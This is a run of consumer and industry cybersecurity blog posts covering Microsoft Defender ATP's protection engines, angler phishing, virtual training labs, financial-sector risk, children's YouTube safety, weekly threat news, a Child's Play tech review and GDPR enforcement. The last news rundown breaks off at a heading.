  • Behavior-based ML engine – Suspicious behavior sequences and advanced attack techniques are monitored on the client as triggers to analyze the process tree behavior using real-time cloud ML models. Monitored attack techniques span the attack chain, from exploits, elevation, and persistence all the way through to lateral movement and exfiltration.
  • AMSI-paired ML engine – Pairs of client-side and cloud-side models perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks. These models include a pair of models for each of the scripting engines covered, including PowerShell, JavaScript, VBScript, and Office VBA macros. Integrations include both dynamic content calls and/or behavior instrumentation on the scripting engines.
  • File classification ML engine – Multi-class, deep neural network classifiers examine full file contents, provides an additional layer of defense against attacks that require additional analysis. Suspicious files are held from running and submitted to the cloud protection service for classification. Within seconds, full-content deep learning models produce a classification and reply to the client to allow or block the file.
  • Detonation-based ML engine – Suspicious files are detonated in a sandbox. Deep learning classifiers analyze the observed behaviors to block attacks.
  • Reputation ML engine – Domain-expert reputation sources and models from across Microsoft are queried to block threats that are linked to malicious or suspicious URLs, domains, emails, and files. Sources include Windows Defender SmartScreen for URL reputation models and Office 365 ATP for email attachment expert knowledge, among other Microsoft services through the Microsoft Intelligent Security Graph.
  • Smart rules engine – Expert-written smart rules identify threats based on researcher expertise and collective knowledge of threats.

On the client:

  • ML engine – A set of light-weight machine learning models make a verdict within milliseconds. These include specialized models and features that are built for specific file types commonly abused by attackers. Examples include models built for portable executable (PE) files, PowerShell, Office macros, JavaScript, PDF files, and more.
  • Behavior monitoring engine – The behavior monitoring engine monitors for potential attacks post-execution. It observes process behaviors, including behavior sequence at runtime, to identify and block certain types of activities based on predetermined rules.
  • Memory scanning engine – This engine scans the memory space used by a running process to expose malicious behavior that may be hiding through code obfuscation.
  • AMSI integration engine – Deep in-app integration engine enables detection of fileless and in-memory attacks through Antimalware Scan Interface (AMSI), defeating code obfuscation. This integration blocks malicious behavior of scripts client-side.
  • Heuristics engine – Heuristic rules identify file characteristics that have similarities with known malicious characteristics to catch new threats or modified versions of known threats.
  • Emulation engine – The emulation engine dynamically unpacks malware and examines how they would behave at runtime. The dynamic emulation of the content and scanning both the behavior during emulation and the memory content at the end of emulation defeat malware packers and expose the behavior of polymorphic malware.
  • Network engine – Network activities are inspected to identify and stop malicious activities from threats.

Together with attack surface reduction—composed of advanced capabilities like hardware-based isolation, application control, exploit protection, network protection, controlled folder access, attack surface reduction rules, and network firewall—these next-generation protection engines deliver Microsoft Defender ATP’s pre-breach capabilities, stopping attacks before they can infiltrate devices and compromise networks.

As part of Microsoft’s defense-in-depth solution, the superior performance of these engines accrues to the Microsoft Defender ATP unified endpoint protection, where antivirus detections and other next-generation protection capabilities enrich endpoint detection and response, automated investigation and remediation, advanced hunting, threat and vulnerability management, managed threat hunting service, and other capabilities.

These protections are further amplified through Microsoft Threat Protection, Microsoft’s comprehensive, end-to-end security solution for the modern workplace. Through signal-sharing and orchestration of remediation across Microsoft’s security technologies, Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

The enormous evolution of Microsoft Defender ATP’s next generation protection follows the same upward trajectory of innovation across Microsoft’s security technologies, which the industry recognizes, and customers benefit from. We will continue to improve and lead the industry in evolving security.

 

Tanmay Ganacharya (@tanmayg)
Principal Director, Microsoft Defender ATP Research

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection appeared first on Microsoft Security.

What is angler phishing?

Many of us live out whole lives on Facebook, Twitter, Instagram and LinkedIn, publicising our thoughts, interacting with friends, strangers and businesses, and keeping abreast of current affairs.

But all that activity has made social media a breeding ground for a new form of cyber attack known as angler phishing.

What is angler phishing?

Angler phishing is a specific type of phishing attack that exists on social media. Unlike traditional phishing, which involves emails spoofing legitimate organisations, angler phishing attacks are launched using bogus corporate social media accounts.

This is how it works: cyber criminals are aware that organisations are increasingly using social media to interact with their customers, whether that’s for marketing and promotional purposes or to offer a simple route for customers to ask questions or make complaints.

Here’s an example:

angler phishing

Making complaints on social media puts pressure on organisations to resolve the issue promptly.

Organisations often respond more quickly to issues raised on social media, as it provides an opportunity for good PR.

Most responses are along the same lines as our example: the organisation asks the customer to provide their personal details, so it can verify the issue and respond appropriately.

Unfortunately, cyber criminals have exploited this by spoofing corporate accounts and intercepting customer queries.


Find out more about phishing >>


They use account handles that mimic legitimate sites ­– like ‘@dominoscustomercare’, for example – search for customer complaints directed at the legitimate site and respond.

Eagle-eyed individuals might notice that the response came from a different account than the one they messaged, but it’s not uncommon for a big company to direct customer complaints to a dedicated account.

But more often than not, people see that the response comes from an account with the organisation’s name and logo and don’t notice the difference.

The fraudster will then ask the customer to direct message them their account details (as many genuine organisations do) or direct them towards what is supposedly a customer support page but is in fact a malicious site, which steals personal information or infects the customer’s device with malware.

Phishing email protection

Many social media users know very little about angler phishing. That’s bad news for organisations, given how often employees browse social media during their lunch breaks or quiet periods.

After all, it only takes one person clicking a bogus link to infect the organisation’s systems.

That’s why it’s important to teach your staff how to spot scammers’ bait. Our Phishing Staff Awareness Course teaches you everything you need to avoid every type of attack, from social media scams to email- and SMS-based threats.

Find out more >>


A version of this blog was originally published on 19 June 2017.

The post What is angler phishing? appeared first on IT Governance Blog.

Are Virtual Cybersecurity Labs the Future of Cybersecurity Education?

Cybercrime affecting businesses has become so widespread that IT and network security professionals are always thinking about that next breach and the costs of recovering from it. This increased risk has also raised the demand for better virtual defenses to prevent the loss of sensitive organizational data such as personal consumer details and internal communications.

There is a substantial need for cybersecurity training. It’s something that many businesses are interested in, but implementing the right system isn’t easy. Physical labs are expensive, require significant time and resources, and aligning everyone’s schedules is often impossible.

Virtual labs are a great way for you to provide your customers and partners with access to the latest cybersecurity product demos and training. These labs are accessible from anywhere, customers can engage with them on their terms, they cost less, and increase the overall quality of the training.

What’s the Appeal of Virtual Cybersecurity Labs?

In the corporate sphere, there has been a trend in recent years of organizations shifting away from traditional instructor-led courses towards virtual cybersecurity training labs. The transition is due to the high demand for meticulous cybersecurity education that offers first-hand experience to participants while keeping costs low.

Cloud-based training environments are appealing because they offer a scenario-based approach. Since the field of cybersecurity requires analytical and critical thinking in real-world circumstances, the controlled environment of a virtual lab is often cited as the best method for teaching network security. Learners will encounter real-world scenarios, work through them, and engage with essential hands-on material that provides more engagement than a traditional slideshow or lecture.

What Are The Primary Benefits of a Virtual Cybersecurity Lab?

  • These classes offer training and simulations that are run through cloud-based virtual machines that are accessible from any of the major browsers. Participants can engage with the material, request help, and engage in team exercises from anywhere in the world.
  • A virtual lab removes the need for travel costs or high-end hardware on the client side since training is conducted primarily through an Internet browser on the employee’s terminal. The simulation is centralized and accessible from anywhere at any time with nothing but an Internet connection.
  • Because the host hardware is centralized, upgrading the lab in response to continually evolving technologies and security trends can be done inexpensively and quickly.
  • A single lab can be expanded to accommodate additional employees or partners at little to no cost. You can add additional RAM, user slots, and other specs as needed. This has helped make virtual labs a popular choice for growing businesses.
  • Feedback between instructors and participants is instant and convenient. Instructors can step in at any point and offer help, track user participation, and other relevant analytics.

What Should You Look for in a Virtual Cybersecurity Environment Provider?

There is no shortage of virtual lab providers on the market. Cloud-based cybersecurity courses are in huge demand because of the added customization that they offer. The process for developing a suitable training lab differs depending on your organization’s needs and preferences. However, here are a few things to consider:

  • Networking devices, including switches, routers, and firewalls. Remember that you want to support multiple instances of virtualization for the networking scenarios used in the course. While you want the reliability of enterprise-grade equipment, consider looking into the refurbished market if your business needs to keep costs low.
  • Find a reputable virtual lab provider. There are many virtual IT labs on the market. Find one that offers the right mix of features, analytics, and the ability to scale as you grow.
  • Have the right IT team in place. Your IT team will need to create the environments for any material that you want to teach within the cloud. Getting started isn’t hard, but it will require an IT professional that knows how to prepare the needed virtual environments.

The goal of this process is to build a successful hands-on virtual cybersecurity lab that is scalable to all participants and teaches essential cybersecurity skills in real-world environments to your customers and business partners.

Are Virtual Cybersecurity Labs Really the Future?

It’s safe to say that cloud technology isn’t going anywhere at this point. We are still feeling the effects of the innovation wave that was caused by the invention of cloud technology.

Everything we do today is tied to the cloud in some way.

  • The most popular software offered by Adobe and Microsoft is all cloud-based.
  • That CRM your business relies on is powered by the cloud.
  • Your favorite Spotify playlist is stored in the cloud.

B2B training is changing. The advancements in virtual labs have accelerated the obsolescence of traditional labs. Agile companies that want to stay competitive will need to accept this and transition their cybersecurity, IT, and product demos to the cloud.

New technologies are frightening to businesses with established processes. But if we’ve learned anything from the failures of Kodak, Nokia, Xerox, Blockbuster, and other large corporations, it’s that failing to stay in line with innovation can (and will) lead to disastrous results in the long-term.

The post Are Virtual Cybersecurity Labs the Future of Cybersecurity Education? appeared first on CyberDB.

How can UK Financial Services Organisations Combat the Cyber Threat?

Guest article by Genevra Champion, Sector Marketing Manager at IT Governance

The financial services industry is naturally a lucrative target for cyber criminals. Financial organisations trade and control vast amounts of money, as well as collect and store customers’ personal information so clearly, a data breach could be disastrous for an industry that is built on trust with its customers.

The financial services industry is second only to retail in terms of the industries most affected by cyber crime – the number of breaches reported by UK financial services firms to the FCA increased 480 per cent in 2018, compared to the previous year. While financial services organisations are heavily regulated and cybersecurity is becoming more of a business priority, there is still much more to be accomplished when it comes to businesses understanding what measures must be taken – from the C-suite down – to effectively protect organisations against inevitable breaches.

So how can financial services firms proactively equip themselves to respond to increased regulatory scrutiny and mitigate the impact from the growing number of threats they will face?

Mitigating the Cyber Threat Financial institutions were able to defend against two-thirds of unauthorised fraud attempts in 2018, but the scale of attacks significantly increased. Significant market players including Tesco Bank, Metro Bank and HSBC all reported breaches in the last year. Clearly, the banks’ cybersecurity defences have not developed at a fast enough pace. Cyber criminals can and will dramatically outspend their targets with increasingly sophisticated attack methods. In addition, many of the traditional banks struggle with large, cumbersome legacy systems, which pose significant reliability issues, as well as flaws in security.

Last year’s IT banking disaster led to thousands of TSB customers being locked out of their accounts, leading to fraudsters exploiting the situation by posing as bank staff on calls to customers in order to steal significant sums of money from customers. The breach occurred while the company was conducting an upgrade on its IT systems to migrate customer data to a new platform. This wasn’t just bad luck for TSB, but a failure to adequately plan and assess the risks that come with such a huge project. The bank has since pledged to refund all customers that are victims of fraud, a move which will likely see other banks reviewing their approach to the rise of this particular type of cybercrime.

The industry must understand that security incidents are an ever-present risk. However, organisations can be prepared - scoping a defence strategy specific to the firm, with processes for implementation, will mean an attack can be quickly identified, isolated and resolved, minimising business impact.

Appropriate Defence Strategy
The FCA has set out various cybersecurity insights that show how cybersecurity practices of UK financial services firms are under the regulatory microscope, as the cyber threat continues to grow. The approach from the FCA includes practices for organisations to put into action such as those that promote governance and put cyber risk on the board agenda. The advice also covers areas such as identifying and protecting information assets, being alert to emerging threats and being ready to respond, as well as testing and refining defences. With cybercrime tools and techniques advancing at a rapid pace, and increasing regulations, it’s no wonder that many organisations struggle to keep up to ensure their defences stay ahead of the game.

In order for in-house security teams to keep up to date with current and evolving threats and data protection issues, firms must invest in regular training. Specialist skills are required to mitigate cyber risk, which for some could be cost-prohibitive. As an alternative, an insourced model allows you to leverage a dedicated and skilled team on an ‘as you need’ basis to deliver an appropriate strategy. With a Cyber Security as a Service (CSaaS) model in place, organisations can rapidly access a dedicated team with the knowledge and skills to deliver a relevant and risk appropriate cyber security strategy.

Crucially, in addition to completing a gap analysis and a multi-layered defence strategy, the model will also apply to people and processes. Attackers will generally aim at the weakest point of an organisation – often it’s staff. Human nature means passwords are forgotten, malware isn’t noticed, or phishing emails are opened, for example. Therefore, a blended approach of technology, processes and shared behaviour is required that promotes the need for staff awareness and education of the risks, in order to effectively combat the threat.

Conclusion
With increased regulatory attention across security and privacy, firms must take steps to improve their defences, or risk severe financial and reputational damage. The issue of cybersecurity risk must become as embedded within business thinking as operational risk. Anyone within an organisation can be a weak link, so the importance of cybersecurity defences must be promoted at all levels – from the board all the way through to the admin departments. It’s everyone’s responsibility to keep the organisation protected against threats.

While the threat of cyber attack is real, financial services firms do not have to take on the battle alone. With a CSaaS model in place, organisations can start to take back control of their cybersecurity strategy and embed it as a trusted, cost-effective and workable core part of the business’ process.

4 eye-opening facts about phishing

You probably know what phishing is. It’s been around almost as long as the Internet, and everyone from your employer to Facebook provides warnings about how to identify and report such scams.

But are you aware of how extensive phishing is? The cyber security company Webroot has identified four facts about how phishing works that might make you see the threat in a new light.

1. Phishing sites have a lifecycle of about 15 hours.

In order to reduce the chances of being detected and blocked, scammers are constantly creating new phishing sites and deactivating old ones.

On average, phishing sites are live for only 15 hours. By the time someone’s raised the alarm about a malicious site and the organisation has updated its security measures and warned employees not to click the link, the fraudster is already well on their way to their next scam.

2. Most malicious links are hidden within benign domains.

Scammers rarely use dedicated domain names for phishing attacks these days, because they can be easily identified and blacklisted.

Instead, malicious emails will almost always contain domains “associated with benign activity” to increase the probability of their success. Criminal hackers prefer to compromise a single page of a benign site and replace its content with a phishing page, which is more difficult to detect.

3. About 400,000 phishing sites are created each month

To keep up with the phishing sites’ brief lifecycle, scammers are forced to create hundreds of thousands of phishing sites each month.

The websites might be used for a single phishing campaign or used for a variety of attacks. Either way, it’s easy to see why it’s so difficult for spam filters keep track of malicious sites. There are simply so many that a few will inevitably fall through the system and end up in users’ inboxes.

4. Google, PayPal and Apple are the most commonly spoofed organisations

Scammers have always targeted well-respected organisations, but things are so much easier for them now that there are dozens of organisations that collect the majority of people’s personal data.

Google is the most frequently spoofed organisation, but PayPal, Amazon and Facebook are also hugely popular subjects for phishing scams.

Want to know how to prevent phishing attacks?

If you want to avoid falling for phishing scams, you have to trust your own judgement. Technological solutions like spam filters can’t catch everything, and they won’t help in the event of specific forms of phishing, like BEC (business email compromise) scams.

Fortunately, no matter how severe the threat is, there are always clues that can help you identify phishing scams.

You can teach your employees how to become experts at spotting those clues with the help of our Phishing Staff Awareness Course. Packed with real-life examples and best practices for staying safe, this online course helps employees become an active part of your organisation’s cyber security strategy.

Find out more >>


A version of this blog was originally published on 14 December 2016.

The post 4 eye-opening facts about phishing appeared first on IT Governance Blog.

Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer

If you haven’t seen your kids in a few hours but can hear outbursts of laughter from a nearby room, chances are, they — along with millions of other kids — are watching YouTube. The popular digital video hub has more viewers than network television and soaks up more than 46,000 years of our collective viewing time annually. Chances are your kids will be part of the YouTube digital mosh pit this summer, but do you know the risks?

Types of screen time

The quality of online time for kids usually shifts during the summer months. For example, there’s active screen time and passive screen time. Knowing the difference between the two can help your family decide best how to balance device use — especially when it comes to consuming endless hours on YouTube.

Active screen time requires a person’s cognitive and/or physical engagement and develops social, language, or physical skills. Engaging in activities such as researching, creating original content, learning a new program, and playing educational games is considered active screen usage. Active screen time tends to go up during the school year and down in the summer.

Passive screen time is passively absorbing information via a screen, app, or game for entertainment reasons only. This includes scrolling through social networks, watching movies binge watching), and watching YouTube videos. Little to no thought or creativity is required when a person engages in repetitious, passive screen activities.

According to a Common Sense Media study, children ages 8 to 12, spend nearly six hours per day using media, and teenagers average closer to nine hours a day (numbers don’t include school work). It’s safe to say that during the summer, these numbers climb even higher — as do the risks.

Here are a few ways to balance screen time and boost safety on YouTube this summer.

YouTube: 5 Family Talking Points

  • Explore YouTube.The best way to understand the culture of YouTube is to spend time there. Ask your kids about their favorite channels and what they like about them. Get to know the people they follow — after all, these are the people influencing your child. Here’s a sampling of a few top YouTubers: MattyBRaps (music), JoJoSiwa (music, dance), Brooklyn and Bailey (vlogs, challenges, music), Baby Ariel (challenges, vlog), Johnny Orlando (music), PewDiePie (comedy), Jacy and Kacy (crafts, challenges), (Bethany Mota (shopping hauls), Grav3yardgirl (makeup), Smosh (comedy).
  • Respect age limits. YouTube is packed with humor, tutorials, pranks, vlogs, music, reviews, and endlessly engaging content. However, age limits exist for a good reason because the channel also has its share of dangerous content. The darker side of YouTube is always just a click away and includes sexual content, hate content, harassment and cyberbullying, violent and graphic content, and scams.
  • Turn on restricted mode. By turning on the restricted mode you can block videos with mature content from a user’s searches, related videos, playlists, and shows — this is a big deal since many “up next” videos (on the right side of the screen) are cued to play automatically and can lead kids to sketchy content. In addition to the restricted mode, consider an extra layer of protection with filtering software for all your family devices.
  • Opt for YouTube Kids. For kids under 13, YouTube Kids is a safe video platform, specially curated for young viewers. Kids may snub any platform designed “for kids,” however, if you are worried about younger kids running into inappropriate content, this is your best video option.
  • Discuss the ‘why’ behind the rules. As a parent, you know the possible ways YouTube — or other social platforms — can be harmful. Don’t assume your kids do. Kids are immersed in their peer groups online, which means danger and harm aren’t primary concerns. Even so, before you lecture kids about the dangers of YouTube, open up a dialogue around the topic by asking great questions. Here are just a few to get you started:

  • Do you understand why it’s important to filter YouTube content and respect age limits (inappropriate content, cyberbullying)?
  • Do you understand why unboxing and makeup videos are so popular (advertisers want you to purchase)?
  • Do you understand why we need to balance between screen time this summer? (mental, physical health)
  • Do you know why this piece of content might be fake or contain questionable information (conspiracy, hate, or political videos)?

As the public increasingly demands social networks do more to remove harmful or objectionable content, one thing is clear: Despite strides in this area by a majority of platforms, no online social hub is (or will likely ever be) 100% safe. The best way to keep kids safe online is by nurturing a strong parent-child connection and having consistent conversations designed to equip and educate kids about digital risks and responsibility.

The post Kids Obsessed with YouTube? How to Help Them Stay Balanced, Safe This Summer appeared first on McAfee Blogs.

This Week in Security News: Cyberespionage Campaigns and Botnet Malware

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about a cyberespionage campaign targeting Middle Eastern countries and a botnet malware that infiltrates containers via exposed Docker APIs.

Read on:

Hackers Are After Your Personal Data – Here’s How to Stop Them

The latest FBI Internet Crime Complaint Center (IC3) report paints an accurate picture of the scale of online threats and shows that consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers.

Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East

Trend Micro uncovered a cyberespionage campaign targeting Middle Eastern countries and named it “Bouncing Golf” based on the malware’s code in the package named “golf.” 

Trend Micro Partners with VIVOTEK to Enhance IP Cameras Security

Trend Micro announced it has blocked 5 million attempted cyberattacks against IP cameras in just five months. Through its strategic partnership with VIVOTEK, Trend Micro’s IoT security solutions are embedded in globally deployed IP cameras to provide superior protection.

AESDDoS Botnet Malware Infiltrates Containers via Exposed Docker APIs

Trend Micro details an attack type where an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community allows attackers to infiltrate containers and run a variant of the Linux botnet malware AESDDoS.

Ransomware Repercussions: Baltimore County Sewer Charges, 2 Medical Services Temporarily Suspended

A ransomware attack in May prevented the Baltimore City and County governments from mailing the annual water and sewage tax bills to its residents due to unverifiable accounts of abnormally low or no water consumption in 2018. 

Hackers Have Carried Out 12 Billion Attacks Against Gaming Sites in 17 Months

Hackers have targeted the gaming industry by carrying out 12 billion credential stuffing attacks against gaming websites in 17 months, according to a new report by internet delivery and cloud services company Akamai. 

Critical Linux and FreeBSD Vulnerabilities Found by Netflix, Including One That Induces Kernel Panic

A Netflix researcher uncovered four critical vulnerabilities within the TCP implementations on Linux and FreeBSD kernels that are related to the minimum segment size (MSS) and TCP Selective Acknowledgement (SACK) capabilities. 

New Oracle WebLogic Zero-day Vulnerability Allows Remote Attacks Without Authentication

Oracle published an out-of-band security alert advisory on CVE-2019-2729, a zero-day deserialization vulnerability that could allow remote attackers to execute arbitrary code on targeted servers.

Xenotime, Hacking Group Behind Triton, Found Probing Industrial Control Systems of Power Grids in the US

The hacking group, Xenotime, behind intrusions targeting facilities in oil and gas industries has started probing industrial control systems (ICSs) of power grids in the U.S. and the Asia-Pacific region, researchers reported.

Data Breach Forces Medical Debt Collector AMCA to File for Bankruptcy Protection

US medical bill and debt collector American Medical Collection Agency (AMCA) has filed for bankruptcy protection in the aftermath of a disastrous data breach that resulted in the theft of information from clients including Quest Diagnostics, LabCorp, BioReference Laboratories and more.

Cryptocurrency Mining Botnet Arrives Through ADB and Spreads Through SSH

Trend Micro observed a new cryptocurrency mining botnet that arrives via open ADB (Android Debug Bridge) ports and can spread from an infected host to any system that has had a previous SSH connection with the host.

Hacker Groups Pounce on Millions of Vulnerable Exim Servers

Multiple groups are launching attacks against exposed Exim mail servers, trying to exploit a vulnerability that could give them permanent root access.

Florida City to Pay $600K Ransom to Hacker Who Seized Computer Systems Weeks Ago

Riviera Beach is paying $600,000 in Bitcoins to a hacker who took over local government computers after an employee clicked on a malicious email link three weeks ago.

Are you up-to-date on the best ways to lower the risk of hackers accessing your personal data? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Cyberespionage Campaigns and Botnet Malware appeared first on .

Movie Tech Review: Child’s Play 2019

BETRAYED: A Trend Micro Child's Play Tech Review

A while back, Rik & Kasia Ferguson shared their thoughts on the movie, “Unfriended: The Dark Web.” The dark web and technology in general plays a pivotal role in the movie’s plot, so the team decided it would be interesting to have a real-world expert review.

Everyone had a lot of fun, and thus Trend Micro movie reviews were born. I was “fortunate” enough to get the next call. The downside? The movie is, “Child’s Play” and I don’t do horror movies well.

Opening night, I powered through, watched the movie and was…pleasantly surprised?

The Movie

Was there too much gore and violence? Absolutely. However, the movie was a lot better than I expected, with an eerie performance by Mark Hamill as the voice of Chucky. Aubrey Plaza, as Karen, played her role well, which added the only real-relatable character of any depth beyond Chucky.

How does this movie rate in the horror genre? No idea. What I do know is that I enjoyed it more than I expected—which was, an admittedly low bar—and found myself entertained for the duration.

[ Spoilers ahead : scroll down if you’re ok with that ]

⤵

⬇

⬇

⬇

⬇

⬇

⬇

⬇

⬇

⬇

⬇

Bad Training Data

Unlike the original entries in the series, this edition brings Chucky into the 21st century. Chucky is no longer a demonically possessed doll, but a blank slate in the form of a nascent AI in a robotic toy doll.

As with any AI or machine learning model, the AI starts off neutral. It requires training data in order to generate results. In Chucky’s case, he is a unique example of the “Buddi” product.

In a classic insider supply chain attack, a QA employee is fired by an overly abusive boss, but before he’s removed from the property, the employee is ordered to finish one last Buddi doll: Chucky.

This employee modifies Chucky’s code to remove any boundary checking for his core behaviours. This creates a truly unbounded, clean slate for the AI that is set out into the world.

Skipping ahead, Chucky is trained on a biased data set. This bias is the naive world view of a group of kids and their run-down neighbourhood. Chucky is exposed to crude humour, horror movies and heated emotional commentary…all without the context to process it.

This tunes the AI to generate the psychotic behaviour that fuels the rest of the movie.

IoT Insecurity

One of the features of this 21st century Buddi doll is the ability to control your smart home. Think of the doll like a walking Alexa or Google Home. Of course, there’s zero authentication or information security controls in place.

Once he’s synced with the latest update from the cloud, Chucky can simply wave his tiny finger and control the devices around him.

This leads to a number of issues around privacy (in this case, used to increase the suspense and move the plot forward) that mirror cases we’ve seen in the real world.

3rd party access to smart speakers to terrorize unsuspecting victims, remote viewing of private video streams, and manipulation of key devices, like thermostats, have all happened already in the real world, but not by rogue AIs.

…yet.

Lateral Movement

In the movie’s climax, Chucky really lets loose. He comes into his digital powers and starts to wreak havoc. Our heroes and supporting cast struggle to respond to this maniacal behaviour. The interesting point is that Chucky has developed enough as a character by this point to understand that it’s not maniacal behaviour from his perspective. To him, it’s perfectly reasonable. This underscores the fact that AI is only as good as it’s training data and won’t highlight bad results from a bad model.

While striving to reach his goal, Chucky—a trusted endpoint in the corporation’s services network—reaches out to all of the compatible devices within his local area.

This type of lateral movement is extremely common in today’s cyberattacks.

The movie presents the issue in an overly dramatic fashion (it is a movie after all), but the point stands up. Most technologies, IoT specifically, are generally designed with two types of endpoints: trusted and untrusted.

Security and privacy controls are then designed to prevent untrusted endpoints from accessing trusted endpoints. Trusted endpoints have little to no verification applied when communicating with each.

In “Child’s Play”, this results in disastrous consequences. In the real world, too.

The movie is a stark—and bloody—reminder that networks and systems need visibility across all endpoints and layers and layers of security and privacy controls.

Takeaways

The way the movie leverages poor AI training, a lack of IoT security, and lateral movement techniques is intriguing, but what really caught my attention is the larger trend within the horror and suspense genre.

Films are moving away from fantasy and otherworldly villains to digital ones. That’s a reflection of how big a role technology plays in our lives, as well as the general lack of deep understanding of how it works.

For me—and the security community—that’s a big challenge: helping people understand cybersecurity and privacy in context.

If you’re looking for a fun suspense film with a technology slant, I would—shockingly— recommend watching this movie. As long as you have realistic exceptions and remember that breaking most current IoT security is…child’s play.

[ 🤣Sorry, couldn’t resist ]

The post Movie Tech Review: Child’s Play 2019 appeared first on .

Adam Levin on CBS This Morning: Catfish Scheme Leads to Murder

Adam Levin was featured on CBS This Morning where he discussed the recent catfish scheme that led to the murder of an Alaska teenager.

Levin warned that young people are especially vulnerable to online manipulation:

“You can ruin your entire life in a matter of minutes based on what you see, what you do and how you react to people online… Do not believe everything you see or hear online.”

 

The post Adam Levin on CBS This Morning: Catfish Scheme Leads to Murder appeared first on Adam Levin.

Will Business Lose Its Cookies Over These New Privacy Laws?

Last month marked the one-year anniversary of the European Union’s General Data Privacy Regulation, or GDPR. Since then, California and New York State have created similar bills aimed at protecting the privacy of their citizens. Nevada has recently enacted a narrow privacy law. Meanwhile, privacy is dead.

Long Live Privacy!

While privacy legislation seems like common sense in the surveillance economy, where unimaginatively intrusive data tracking and compiling is commonplace, even the GDPR’s strongest proponents say the launch of the EU’s much vaunted privacy protections was pretty rocky. While California has passed similar strict legislation, it does not take effect until 2020, and as regulations required for its implementation are being promulgated, there is enormous pressure being brought to bear by various business and industry lobbying groups to water it down. New York’s Privacy Act might up the ante for no-can-do in the realm of who-are-you with even more stringent prohibitions than put in place by California’s Consumer Privacy Act (CCPA).

At this anniversary time, it’s worth looking at what has and hasn’t worked in Europe.

The Good, the Bad, or the Woefully Ineffective?

Looking at the numbers released by the EU, familiarity with the law itself has been one of its greatest successes: Sixty-seven percent of Europeans have heard of the GDPR, and there were 144,376 queries and complaints reported in its first year. Add to these impressive figures the 89,271 data breach notifications issued, and it’s clear that despite its flaws, the law successfully addresses a set of problems that a more scattershot approach (with multiple statutes enacted by different EU member states) was unable to achieve.

Where the GDPR comes up short is enforcement: While the law includes fines for the mishandling of data for up to 4 percent of a company’s annual global revenue, the actual numbers so far have been underwhelming. Far from preventative, they almost encourage bad cybersecurity. Take Google. The company was fined €50 million (roughly $57 million) for lack of consent on advertisements–not a big number for them–and this fine comprised the bulk of the €56 million of fines levied in total.

Needless to say, for Google a fine of this nature would be an acceptable cost of doing business in the EU.

It is anticipated that heavier fines will be placed on companies under the GDPR going forward, Facebook most likely being the poster child, but the message so far is clear: Fines need to hurt if the goal is the deterrence of poor data practices.

The Biggest Issue

By far the largest flaw in the GDPR has been a lack of clarity caused by poor communication.

Even though 67 percent of Europeans have heard of the GDPR, only 20 percent know which public authority is responsible for it. Misinformation combined with the requirement for 72-hour breach notification set off a deluge to the U.K. data privacy regulator in 2018. One-third of those calls involved incidents well below the GDPR’s threshold. Misconceptions about what exactly was required under the law were so widespread that the Irish Data Protection Commission actually blogged about whether taking pictures of one’s children at a school event is permissible. (It is.)

Corporations have also struggled with what many perceive as the law’s ambiguity. Under the GDPR, “companies processing large amounts of special categories of personal data” are required to hire a data protection officer, or DPO, to ensure compliance. The problem is that the law doesn’t specifically define what “large amounts” are, and although the DPO is required to have “expert knowledge of data protection law,” there is no set definition for what qualifies as an expert, either. It’s a great idea to have someone at large corporations ensuring the careful and lawful handling of customer data, but the implementation is ill-defined by the GDPR, which could make a DPO’s job awkward or downright impossible.

The kinds of confusion caused by the GDPR seem contagious, and that’s just the nature of the beast. There are many stakeholders in the privacy racket, and they are often vigorously at odds with one another.

The privacy laws in the U.S. will be more of the same. The best innovation when it comes to the GDPR was that it created one law instead of a patchwork that might change the moment you crossed a border. While New York and California should be applauded for taking steps to protect the privacy and data of their citizens, having multiple sets of requirements for websites and businesses alike (as we have witnessed with more than 50 U.S. jurisdictions’ having individual and not necessarily complementary breach notification laws) will necessarily lead to widespread difficulty in their implementation and accessibility.

Perhaps the most important takeaway for any state wishing to mirror the data protections of the GDPR is that in order to be privacy-friendly and consumer-friendly, the application of the law itself should at least try to be user-friendly, too. Too many differences run the risk of any and all of these laws’ being accept gnats to be clicked away when we visit our favorite websites–and that is a giant fail.

Laws are supposed to solve problems, and keep others from happening. When it comes to privacy, we have a long way to go.

The post Will Business Lose Its Cookies Over These New Privacy Laws? appeared first on Adam Levin.

Cyber News Rundown: GPS Vulnerabilities in Tesla Vehicles

Reading Time: ~ 2 min.

Multiple Tesla Models Vulnerable to GPS Attacks

Though it’s not the only manufacturer to offer GPS navigation in their vehicles, Tesla has once again suffered an attack on their GPS autopilot features. These attacks were able to trick the car into thinking it had arrived at an off-ramp more than two miles early, causing it to start to merge and eventually turn off the road entirely, even with a driver attempting to stop the action. Using off-the-shelf products, the test conductors were able to gain control of Tesla’s GPS in less than a minute.

Oregon DHS Successfully Phished

The personally identifiable information for at least 645,000 Oregon Department of Human Services (DHS) patients was illicitly accessed after a successful phishing attack on nine DHS employees. The attack allowed the hackers to obtain 2 million emails from the accounts, which contained everything from names and birthdates to social security numbers and confidential health information. Fortunately, the DHS issued a password reset shortly after the initial breach that stopped the attackers from getting any further and began contacting potential victims of the attack.

IP and Computer Blacklisting in New Ryuk Variant

The latest variant of the Ryuk ransomware includes an IP blacklist and a computer name check prior to beginning encryption. The IPs and computer name strings were likely implemented to stop any encryption of Russian computer systems. After these checks, the ransomware continues as normal using .RYK as the appended file extension and a ransom note that points victims to make payments to one of two proton mail accounts.

EatStreet Ordering Services Breached

A data breach is affecting the food ordering service EatStreet and possibly all of its 15,000 partnered restaurants. Payment card information for millions of customers using the app, along with some banking information for the 15,000 business partners, is believed to have been compromised in the breach. Though EatStreet quickly began improving their security and implementing multi-factor authentication following the breach, the damage was already done.

Fake System Cleaners on the Rise

